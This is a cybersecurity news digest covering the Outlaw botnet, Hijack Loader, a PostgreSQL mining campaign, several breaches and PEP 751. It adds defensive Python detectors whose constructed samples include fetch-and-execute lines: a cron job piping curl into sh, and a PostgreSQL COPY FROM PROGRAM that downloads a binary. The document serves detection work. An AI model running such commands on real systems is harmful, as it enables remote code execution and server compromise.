👉 What’s trending in cybersecurity today?
Outlaw Linux Malware, SSH Brute-Forcing, Botnet, Wireless Attack, Passwords, Backdoor Signals, Hijack Loader, Anti-VM Checks, Call Stack Spoofing, PostgreSQL Servers, Fileless Cryptocurrency Mining, Suspicious Scanning Activity, Palo Alto Networks, GlobalProtect Gateways, Houston Housing Authority, Data Breach, Russia RZD Railway, Cyberattack, Italy, Ticketing Systems, SimonMed Imaging, Sensitive Patient Information, Systex Corporation, Ransomware Attack, US House Homeland Security, State and Local Cybersecurity, EU Strategy, Internal Security, Encryption Issues, Python Lock File Format, Dependency Management, ReliaQuest, AI Security Platform, Cybercriminals, Lookalike Domains, Financial Fraud, Email Scams.
1. Outlaw Linux Malware Uses SSH Brute-Forcing
Outlaw is a long-running Linux botnet that relies on basic but effective techniques. It propagates mainly by brute-forcing SSH logins on hosts with weak or default credentials. Once in, it deploys its payloads and establishes persistence through cron jobs and by rewriting the victim's authorized SSH keys, so the operators keep access even after the password is changed. It then scans and attacks neighbouring hosts on the local subnet, giving it worm-like spread, while a modified cryptocurrency miner provides the monetization.
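The three artefacts named above (a burst of failed SSH logins followed by a success, a cron job that fetches and runs something, and a key that nobody inventoried in authorized_keys) are what a responder would look for on a suspected host. The script below is an added example, not code from the Outlaw write-up: it runs those checks over constructed auth.log, crontab and authorized_keys samples (hosts, IPs, key blobs and comments are all made up), and the indicator patterns are the author's own, not a published signature.

```python
"""Triage a Linux host for the Outlaw-style SSH brute force and persistence pattern.
Added example; all sample data below is constructed."""
import re
from collections import Counter, defaultdict

# Constructed sample auth.log lines (hosts, IPs and users are made up for this example).
SAMPLE_AUTH_LOG = """\
Apr  2 10:00:01 web1 sshd[2201]: Failed password for invalid user admin from 203.0.113.7 port 51012 ssh2
Apr  2 10:00:02 web1 sshd[2203]: Failed password for root from 203.0.113.7 port 51014 ssh2
Apr  2 10:00:03 web1 sshd[2205]: Failed password for root from 203.0.113.7 port 51016 ssh2
Apr  2 10:00:04 web1 sshd[2207]: Failed password for invalid user oracle from 203.0.113.7 port 51018 ssh2
Apr  2 10:00:05 web1 sshd[2209]: Failed password for root from 203.0.113.7 port 51020 ssh2
Apr  2 10:00:06 web1 sshd[2211]: Accepted password for root from 203.0.113.7 port 51022 ssh2
Apr  2 10:00:09 web1 sshd[2215]: Failed password for alice from 198.51.100.4 port 40002 ssh2
Apr  2 10:00:15 web1 sshd[2217]: Accepted publickey for alice from 198.51.100.4 port 40004 ssh2
"""

# Constructed root crontab: one legitimate job, one fetch-and-run job, one job in a hidden temp dir.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * /bin/sh -c 'curl -s http://203.0.113.7/x.sh | sh'
@reboot /tmp/.X19-unix/.rsync/a/init0
"""

# Constructed authorized_keys: an inventoried user key, a restricted deploy key, and a rogue key.
SAMPLE_AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyAlice alice@laptop
from="10.0.0.5" ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleDeployKey deploy@ci
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQExampleRogueKey rogue@unknown
"""

FAILED_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPTED_RE = re.compile(r"sshd\[\d+\]: Accepted (\S+) for (\S+) from (\S+) port")

# Author's own indicator list: run-from-temp/hidden paths, or download-and-execute one-liners.
SUSPICIOUS_CRON_RE = re.compile(
    r"(/tmp/|/dev/shm/|/var/tmp/|/\.[A-Za-z0-9_]+/|curl\s|wget\s|\|\s*(?:ba)?sh\b|base64\s+-d)")


def find_bruteforce(log_text, threshold=5):
    """Return {ip: (failed_count, [users accepted from that ip])} for IPs at or above threshold.
    A success that follows a run of failures from the same source is the brute-force-then-login pattern."""
    failures = Counter()
    successes = defaultdict(list)
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failures[m.group(2)] += 1
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            successes[m.group(3)].append(m.group(2))
    return {ip: (n, successes.get(ip, [])) for ip, n in failures.items() if n >= threshold}


def suspicious_cron_entries(crontab_text):
    """Return cron lines that fetch-and-run or execute from temp/hidden directories."""
    hits = []
    for line in crontab_text.splitlines():
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        if SUSPICIOUS_CRON_RE.search(entry):
            hits.append(entry)
    return hits


def unexpected_keys(authorized_keys_text, known_comments):
    """Return authorized_keys entries whose trailing comment is not in the key inventory.
    Assumes an options field, if present, contains no spaces (true for from=/command= without args)."""
    out = []
    for line in authorized_keys_text.splitlines():
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        parts = entry.split()
        if not parts[0].startswith(("ssh-", "ecdsa-", "sk-")):  # leading options field
            parts = parts[1:]
        comment = parts[2] if len(parts) >= 3 else ""
        if comment not in known_comments:
            out.append(entry)
    return out


if __name__ == "__main__":
    print("brute force:", find_bruteforce(SAMPLE_AUTH_LOG))
    print("cron:", suspicious_cron_entries(SAMPLE_CRONTAB))
    print("keys:", unexpected_keys(SAMPLE_AUTHORIZED_KEYS, {"alice@laptop", "deploy@ci"}))
```

On a real host, feed the script `/var/log/auth.log` (or `journalctl -u ssh`), `crontab -l` for each user plus `/etc/cron.d/*`, and every `~/.ssh/authorized_keys`; also check whether that file has been made immutable with `chattr +i`, which a plain read will not reveal.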
2. Wireless Attack Steals Passwords Undetected
Researchers have described a new attack, dubbed the “Channel Triggered Backdoor Attack,” that uses wireless signals to activate covert backdoors. Subtle, attacker-controlled variations in the wireless channel act as the trigger, which lets the backdoor stay dormant and invisible to conventional security controls until the right signal arrives. By encoding commands in these variations, the attacker can make the implant capture keystrokes during password entry and harvest the credentials.
3. Hijack Loader Malware New Evasion Tactics
Hijack Loader has received a significant update that adds call stack spoofing (forging the chain of return addresses so that a stack walk by an EDR or analyst looks benign) and anti-VM checks to avoid running inside analysis sandboxes. The loader still delivers second-stage payloads such as information stealers and injects code into other processes. It also uses the Heaven’s Gate technique, switching a 32-bit process into 64-bit mode to call native APIs that 32-bit user-mode hooks cannot see, and adds persistence modules to keep long-term control of infected devices.
4. Over 1500 PostgreSQL Servers Compromised
A cloud security firm reported an ongoing campaign against exposed PostgreSQL instances that has compromised more than 1,500 servers. The actor, tracked as JINX-0126, abuses the COPY SQL command (which, for a superuser, can pipe data to or from an operating-system program) to run commands on the host and deploy fileless cryptocurrency miners, and gives each victim a uniquely hashed binary to defeat hash-based detection. The campaign relies on weak, internet-exposed PostgreSQL configurations and drops binaries named PG_CORE and postmaster that establish persistence and escalate privileges.
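Two checks a defender can run today, as an added example (not the security firm's tooling): an audit of pg_hba.conf for the weak access rules such a campaign depends on, and a scan of the PostgreSQL statement log for COPY ... FROM PROGRAM / COPY ... TO PROGRAM, the documented statement form that hands a shell command to the server's OS user. The config file and log lines are constructed; the path and URL in them are placeholders.

```python
"""Audit pg_hba.conf and scan statement logs for COPY ... PROGRAM abuse.
Added example; inputs are constructed."""
import re

# Constructed pg_hba.conf with one good local rule, one good loopback rule, and two bad rules.
SAMPLE_PG_HBA = """\
# TYPE  DATABASE  USER      ADDRESS        METHOD
local   all       all                      peer
host    all       all       127.0.0.1/32   scram-sha-256
host    all       all       0.0.0.0/0      trust
host    all       postgres  0.0.0.0/0      md5
hostssl app       app_ro    10.0.0.0/8     scram-sha-256
"""

# Constructed log lines in the default log_line_prefix style with log_statement = 'all'.
SAMPLE_PG_LOG = """\
2025-04-01 12:00:01 UTC [4411] postgres@postgres LOG:  statement: CREATE ROLE svc LOGIN PASSWORD 'x';
2025-04-01 12:00:02 UTC [4411] postgres@postgres LOG:  statement: COPY loot FROM PROGRAM 'curl -s http://198.51.100.9/pg_core -o /tmp/pg_core; chmod +x /tmp/pg_core';
2025-04-01 12:00:03 UTC [4412] app_ro@app LOG:  statement: COPY sales TO '/var/lib/postgresql/export.csv' CSV;
2025-04-01 12:00:04 UTC [4411] postgres@postgres LOG:  statement: COPY (SELECT 1) TO PROGRAM '/tmp/pg_core &';
"""

COPY_PROGRAM_RE = re.compile(r"\bCOPY\b.*\b(?:FROM|TO)\s+PROGRAM\b", re.IGNORECASE)
USER_RE = re.compile(r"\]\s+(\S+)@(\S+)\s+LOG:")


def audit_pg_hba(text):
    """Return (line_number, finding) pairs for risky pg_hba.conf rules."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if fields[0] == "local":  # Unix-socket rule: no ADDRESS column
            if len(fields) < 4:
                continue
            kind, user, address, method = fields[0], fields[2], None, fields[3]
        else:  # host / hostssl / hostnossl rules carry an address
            if len(fields) < 5:
                continue
            kind, user, address, method = fields[0], fields[2], fields[3], fields[4]
        if method == "trust" and kind != "local":
            findings.append((lineno, f"password-less 'trust' login from {address}"))
        if address in ("0.0.0.0/0", "::/0", "all") and user in ("all", "postgres"):
            findings.append((lineno, f"'{user}' reachable from any address via {method}"))
    return findings


def find_copy_program(log_text):
    """Return (db_user, statement) for every logged COPY that invokes an OS program."""
    hits = []
    for line in log_text.splitlines():
        if "statement:" not in line or not COPY_PROGRAM_RE.search(line):
            continue
        m = USER_RE.search(line)
        user = m.group(1) if m else "?"
        hits.append((user, line.split("statement:", 1)[1].strip()))
    return hits


if __name__ == "__main__":
    for lineno, finding in audit_pg_hba(SAMPLE_PG_HBA):
        print(f"pg_hba.conf:{lineno}: {finding}")
    for user, stmt in find_copy_program(SAMPLE_PG_LOG):
        print(f"{user}: {stmt}")
```

Plain COPY to a file path (line 3 of the sample) is deliberately not flagged: it is normal export behaviour, whereas the PROGRAM form requires superuser or the pg_execute_server_program role, so any hit outside a known maintenance job deserves a look. Pair the log scan with `SELECT rolname FROM pg_roles WHERE rolsuper;` to see who could have issued it.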
5. Login Scans Hit Palo Alto Networks Systems
A surge in suspicious login attempts against Palo Alto Networks PAN-OS GlobalProtect portals has been observed. Over 24,000 unique IP addresses took part between March 17 and 26, 2025, with daily attempts peaking at nearly 24,000. The activity looks like a coordinated effort to identify exposed portals and probe them for weaknesses ahead of later exploitation. Most of the traffic originated in the United States and Canada, and targets also included the United Kingdom, Ireland, Russia, and Singapore. Experts warn that scanning patterns of this kind have often preceded attacks exploiting newly disclosed vulnerabilities, so administrators of exposed portals should review authentication logs for the period and confirm PAN-OS is fully patched.
6. Houston Housing Authority Breach Affects 30K
The Houston Housing Authority (HHA) has notified more than 30,000 Texans of a data breach resulting from a ransomware attack. Exposed data includes Social Security numbers, medical details, financial information, and addresses. After confirming the breach, HHA opened an investigation and began sending notification letters that tell each affected individual which of their data was compromised.
7. RZD Railway Cyberattack Disrupts Services
RZD, Russia’s state-owned railway, suffered a cyberattack that temporarily took down its website and mobile app. The attack was a distributed denial-of-service (DDoS) flood that overwhelmed the platforms with traffic, making them inaccessible; ticket sales continued at physical counters in stations and terminals. RZD has not disclosed the scale of the attack or when full functionality will be restored, and the attacker has not been identified.
8. Cyberattack Disrupts Mom Ticketing in Italy
An ongoing cyberattack has disrupted the electronic ticketing systems of MOM (Mobilità di Marca), the public transport operator in Treviso, Italy. The incident hit the Telemaco platform run by supplier Plus Service and left commuters and students without digital ticketing for two days; passengers fell back on paper tickets and call centres were overwhelmed. Service began returning to normal on the second day, although some issues persisted.
9. SimonMed Imaging Reports Data Breach Impact
SimonMed Imaging recently disclosed a data breach that compromised sensitive patient information. Between January 21 and February 5, 2025, an unauthorized third party accessed personal data, including names, Social Security numbers, medical records, and health insurance details. The company has launched an investigation to assess the full impact and is notifying affected individuals about the exposed information. SimonMed, an outpatient imaging provider based in Arizona, continues to monitor the situation and will provide updates as more details emerge.
10. Systex Corporation Reports Ransomware Attack
Systex Corporation, a Taiwanese IT service provider, confirmed a ransomware attack on March 31, 2025, after receiving a ransom note. Preliminary investigations suggest the involvement of the hacker group CrazyHunter, which has previously targeted Taiwanese medical institutions. While the company has not disclosed details about the ransom demand or the impact on data, it has assured that no significant operational disruptions have occurred thus far.
11. US House Panel Reviews Cyber Grant Program
The U.S. House Homeland Security Subcommittee examined the State and Local Cybersecurity Grant Program, which is up for reauthorization this year. Cybersecurity experts testified that with targeted adjustments, the program could improve its effectiveness in strengthening the cybersecurity of state and local governments. Subcommittee members also explored potential collaborations between the federal government and state and local governments to combat the rising threat of cyberattacks.
12. EU Commission Launches New Security Strategy
The European Commission has introduced the ProtectEU strategy to enhance internal security within the European Union. A central part of the plan is boosting Europol’s capabilities, positioning it to handle large-scale investigations and provide stronger support to member states. The strategy also addresses the challenges that encryption poses for investigators, seeking solutions that balance law enforcement access with privacy rights. In addition, the Commission seeks to improve intelligence-sharing among member states, strengthen cybersecurity measures, and ensure that the EU is prepared for evolving security threats.
13. Python Adopts Standardized Lock File Format
Python’s packaging community has accepted PEP 751, which defines pylock.toml, a standardized lock file format for recording exactly which dependencies to install. The format aims to improve security, reproducibility, and tool interoperability: a lock records each dependency’s resolved version and the artifacts to install, so an installation can be reproduced exactly, and because tools such as Poetry, PDM, and pip-tools can all emit or consume the same file, developers are no longer tied to one tool’s private lock format. Security-relevant fields include per-artifact hashes and file sizes, which let an installer refuse a download that does not match what was locked, closing off one avenue for supply chain tampering.
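What an installer does with those hashes and sizes, as an added example that is not part of PEP 751 or any installer’s code: parse a pylock.toml, fetch each recorded artifact, and refuse anything whose size or digest differs. The field names used (`lock-version`, `packages`, `wheels`, `url`, `size`, `hashes`) follow PEP 751 as the author understands it; the package, its URL and the “downloaded” bytes are constructed so the script runs offline, and the lock is generated in-script the way a locker would, by hashing the artifact it saw.

```python
"""Verify downloaded artifacts against the size and hashes recorded in a pylock.toml.
Added example; the lock file and artifact bytes are constructed."""
import hashlib
import hmac

try:
    import tomllib  # Python 3.11+
except ModuleNotFoundError:  # older interpreters: pip install tomli
    import tomli as tomllib

# Constructed stand-in for a downloaded wheel (not a real zip archive).
FAKE_WHEEL = b"PK\x03\x04 constructed wheel bytes for demo_pkg-1.0.0"
# Same length, one bit flipped: the case hashes exist to catch and size alone would miss.
TAMPERED_WHEEL = bytes([FAKE_WHEEL[0] ^ 1]) + FAKE_WHEEL[1:]

# Minimal lock built the way a locker would: exact size and sha256 of the artifact it resolved.
PYLOCK_TOML = f"""\
lock-version = "1.0"
created-by = "demo-locker"
requires-python = ">=3.11"

[[packages]]
name = "demo-pkg"
version = "1.0.0"

[[packages.wheels]]
name = "demo_pkg-1.0.0-py3-none-any.whl"
url = "https://files.example.invalid/demo_pkg-1.0.0-py3-none-any.whl"
size = {len(FAKE_WHEEL)}
hashes = {{ sha256 = "{hashlib.sha256(FAKE_WHEEL).hexdigest()}" }}
"""


def parse_lock(text):
    """Parse a pylock.toml and reject versions this checker does not understand."""
    lock = tomllib.loads(text)
    if lock.get("lock-version") != "1.0":
        raise ValueError(f"unsupported lock-version {lock.get('lock-version')!r}")
    return lock


def verify_artifact(entry, data):
    """Check one wheel/sdist table against the bytes fetched from entry['url'].
    Returns (ok, reason). Size is checked first (cheap), then every listed hash must
    match; an entry with no hashes is rejected rather than silently trusted."""
    if "size" in entry and entry["size"] != len(data):
        return False, f"size mismatch: expected {entry['size']}, got {len(data)}"
    hashes = entry.get("hashes") or {}
    if not hashes:
        return False, "no hashes recorded"
    for algo, expected in hashes.items():
        try:
            digest = hashlib.new(algo, data).hexdigest()
        except ValueError:
            return False, f"unsupported hash algorithm {algo}"
        if not hmac.compare_digest(digest, expected.lower()):
            return False, f"{algo} mismatch"
    return True, "ok"


def verify_lock(text, fetch):
    """Verify every wheel in the lock; `fetch(url) -> bytes` stands in for the download step."""
    results = {}
    for pkg in parse_lock(text)["packages"]:
        for wheel in pkg.get("wheels", []):
            results[wheel["name"]] = verify_artifact(wheel, fetch(wheel["url"]))
    return results


if __name__ == "__main__":
    print(verify_lock(PYLOCK_TOML, lambda url: FAKE_WHEEL))
    print(verify_lock(PYLOCK_TOML, lambda url: TAMPERED_WHEEL))
```

The one policy decision worth noting is that a wheel entry with no `hashes` table fails verification instead of passing: a lock that merely pins versions gives reproducibility, but only the hashes give the supply-chain guarantee the item above describes.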
14. ReliaQuest Raises $500M for AI Security
ReliaQuest has successfully raised $500 million, bringing its valuation to $3.4 billion, to further develop its AI-driven cybersecurity platform, GreyMatter. The funding will be used to enhance the platform’s automation capabilities, enabling security teams to respond to cyber threats more efficiently. With over 1,000 customers and $300 million in annual recurring revenue, ReliaQuest is expanding its international presence and improving its ability to detect, contain, and investigate security incidents.
15. Lookalike Domains Fuel Cybercriminal Scams
Cybercriminals are increasingly registering lookalike domains to run email-based social engineering and financial fraud. These domains differ from a legitimate one by a swapped, added, or visually similar character, so recipients struggle to tell genuine messages from fraudulent ones. Common tactics include phishing, executive impersonation, and invoice scams, which target sectors such as finance, legal services, and insurance. Attackers mine public sources and breach dumps for details that make their emails more convincing, raising the likelihood of success.
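A mail gateway or SOC can score inbound sender domains against a protected brand to catch the three lookalike styles described above: typosquats (one edit or transposition away), homoglyphs (characters that render like the brand's, including punycode-encoded Unicode), and brand-plus-suffix combos (acmecorp-invoices). The script below is an added example, not code from the report; the brand, the sender list and the confusable-character table are the author's constructions, and the registrable-label logic is a simplification (a production tool would use the public suffix list).

```python
"""Classify sender domains as homoglyph / combo / typosquat lookalikes of a brand domain.
Added example; brand and senders are constructed."""
import unicodedata

BRAND_DOMAIN = "acmecorp.com"  # constructed brand; assumed to be plain ASCII with no confusables

# Constructed inbound senders: two legitimate, one homoglyph (rn -> m), one combo,
# one transposition typosquat, one unrelated, and one IDN homoglyph using Cyrillic 'о'.
SAMPLE_SENDERS = [
    "billing@acmecorp.com",
    "it@mail.acmecorp.com",
    "ceo@acrnecorp.com",
    "ap@acmecorp-invoices.com",
    "hr@acmecrop.com",
    "news@example.org",
    "support@" + "acmec\u043erp".encode("idna").decode("ascii") + ".com",
]

# Multi-character confusables first (so "rn" folds before single letters are touched), then
# digits and a few Cyrillic letters that render identically to Latin ones in most fonts.
CONFUSABLES = [
    ("rn", "m"), ("vv", "w"), ("cl", "d"),
    ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"), ("7", "t"),
    ("\u0430", "a"), ("\u0435", "e"), ("\u043e", "o"),
    ("\u0440", "p"), ("\u0441", "c"), ("\u0445", "x"),
]


def osa_distance(a, b):
    """Optimal string alignment distance: edits plus adjacent transpositions."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def registrable_label(domain):
    """Second-level label (simplification: no public suffix list, so 'co.uk' is mishandled)."""
    labels = domain.lower().rstrip(".").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def fold(label):
    """Decode punycode, strip accents, then fold confusable sequences to their Latin look-alikes."""
    if label.startswith("xn--"):
        label = label.encode("ascii").decode("idna")
    label = unicodedata.normalize("NFKD", label)
    label = "".join(ch for ch in label if not unicodedata.combining(ch))
    for src, dst in CONFUSABLES:
        label = label.replace(src, dst)
    return label


def classify(domain, brand_domain=BRAND_DOMAIN):
    brand = registrable_label(brand_domain)
    domain = domain.lower().rstrip(".")
    if domain == brand_domain or domain.endswith("." + brand_domain):
        return "legitimate"
    label = registrable_label(domain)
    folded = fold(label)
    if folded == brand and label != brand:
        return "homoglyph"  # identical to the brand once look-alike characters are folded
    if brand in folded and folded != brand:
        return "combo"  # brand name plus extra words: acmecorp-invoices, acmecorp-support
    if osa_distance(folded, brand) <= max(1, len(brand) // 5):
        return "typosquat"  # within one edit (or one more per ~5 chars of brand length)
    return "unrelated"


def flag_senders(addresses, brand_domain=BRAND_DOMAIN):
    """Return {sender_domain: verdict} for every sender that imitates the brand."""
    flagged = {}
    for addr in addresses:
        domain = addr.rsplit("@", 1)[-1].lower()
        verdict = classify(domain, brand_domain)
        if verdict not in ("legitimate", "unrelated"):
            flagged[domain] = verdict
    return flagged


if __name__ == "__main__":
    for domain, verdict in flag_senders(SAMPLE_SENDERS).items():
        print(f"{verdict:10} {domain}")
```

Folding before comparing is what makes the punycode case work: `xn--` labels are decoded back to Unicode, and only then are the Cyrillic letters mapped onto their Latin twins, so the sender is recognised as the brand name rather than as an unrelated string one edit away from it.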
Copyright © 2025 CyberMaterial. All Rights Reserved.